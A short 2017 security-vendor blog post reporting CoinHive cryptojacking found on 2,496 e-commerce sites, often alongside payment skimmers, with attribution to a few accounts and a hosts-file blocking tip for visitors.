Cryptojacking found on 2496 online stores
by Sansec Forensics Team
Published in Threat Research − November 07, 2017
Does your laptop get hot when visiting your favorite shop? You computer is likely mining cryptocurrencies to the benefit of a cyberthief.
Cryptojacking - running crypto mining software in the browser of unsuspecting visitors - is quickly spreading around the web. And the landgrab extends to online stores. The infamous CoinHive software was detected today on 2496 e-commerce sites.
Skimming and cryptomining, a golden match
Now, it does not seem likely that the legitimate store owners wanted to earn a few extra bucks and have added CoinHive themselves. I found that 80% of cryptomining stores also contain payment skimming malware. Apparently, cyberthieves are squeezing every penny out of their confiscated assets.
Spread fuelled by just a few individuals
As CoinHive requires a unique ID, we can analyze the distribution of crypto thieves. Out of 2496 infected stores, 85% is linked to only 2 CoinHive accounts, while the remaining 15% is spread out over unique CoinHive accounts. Because the tag added to this remaining 15% segment is consistenly the site's name, my guess is that this cryptojacking surge on online stores can be attributed to just 3 individuals or groups.
Well hidden
Some sites bluntly include the official coinhive.js file, others are more stealthy and include an iframe that points to siteverification.online
. This site shows a default Debian installation page but include a cryptominer nevertheless. Yet others disguise as Sucuri Firewall.
Fix for your browser
Use an adblocker or install a Chrome plugin or add 127.0.0.1 coin-hive.com coinhive.com
to your hosts file.
We have added detection signatures to our eCommerce security scanner.
Read more
Easy CSP for your store?
Try Sansec Watch! Free, simple and fully integrated. Get PCI compliant alerting with minimal effort.
Sansec WatchScan your store now
for malware & vulnerabilities
eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.
Learn more